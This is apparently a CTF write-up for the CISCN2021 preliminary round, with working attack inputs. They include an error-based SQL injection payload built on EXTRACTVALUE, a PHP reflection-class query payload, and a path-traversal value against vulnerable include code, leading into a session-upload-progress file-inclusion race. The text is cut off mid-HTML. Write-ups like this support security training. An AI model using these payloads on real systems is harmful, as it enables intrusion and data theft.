[CISCN2021]初赛

本文详细介绍了CISCN2021初赛的四个部分:通过SQL注入获取信息,利用PHP反射类解决原题,借助PHP_SESSION_UPLOAD_PROGRESS进行文件包含攻击,以及分析机械臂的流量包完成任务。参赛者需掌握SQL技巧、PHP源码理解和网络流量分析等技能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

easy_sql

无列名和报错注入

uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+

在这里插入图片描述
出了字段名1d004bae-a9e9-4f4e-8af1-c9518d464307

uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(select RIGHT(`column`,31) from flag)))--+

在这里插入图片描述
出了后段^rgiXT-97SMk-yiGwB-Ithem-Ozeer-}

flag还挺长,再出个前段CISCN{rgiXT-97SMk-yiGwB-Ithem-O
在这里插入图片描述

easy_source

原题

这题考察了php原生类的使用,参考ctfshow的web100

使用反射类new ReflectionClass("类名"),获得这个类的信息


/?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment

在这里插入图片描述

middle_source

<?php
    highlight_file(__FILE__);
    echo "your flag is in some file in /etc ";
    $fielf=$_POST["field"];
    $cf="/tmp/app_auth/cfile/".$_POST['cf'];
    
    if(file_exists($cf)){
   
        include $cf;
        echo $$field;
        exit;
    }
    else{
   
        echo "";
        exit;
    }
?>

PHP_SESSION_UPLOAD_PROGRESS加条件竞争进行文件包含

参考之前做的ctfshow的web 82-86

这里有phpinfo

field=1&cf=../../../var/www/html/you_can_seeeeeeee_me.php

在这里插入图片描述
拿到session的目录:/var/lib/php/sessions/eciaadedie/

post包:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content=
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值